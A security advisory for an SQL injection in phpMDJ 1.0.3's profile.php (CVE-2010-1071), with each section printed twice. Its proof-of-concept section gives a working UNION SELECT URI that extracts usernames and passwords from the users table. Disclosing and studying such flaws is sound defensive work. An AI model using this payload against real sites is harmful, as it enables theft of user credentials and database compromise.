phpMDJ 'profile.php' SQL Injection Vulnerability
BID:37698
Info
phpMDJ 'profile.php' SQL Injection Vulnerability
| Bugtraq ID: | 37698 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1071 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2010 12:00AM |
| Updated: | Apr 13 2015 09:03PM |
| Credit: | k4cp3r and Ablus |
| Vulnerable: |
phpMDJ.net phpMDJ 1.0.3 |
| Not Vulnerable: | |
Discussion
phpMDJ 'profile.php' SQL Injection Vulnerability
phpMDJ is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpMDJ 1.0.3 is vulnerable; other versions may be affected as well.
phpMDJ is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpMDJ 1.0.3 is vulnerable; other versions may be affected as well.
Exploit / POC
phpMDJ 'profile.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--
Solution / Fix
phpMDJ 'profile.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].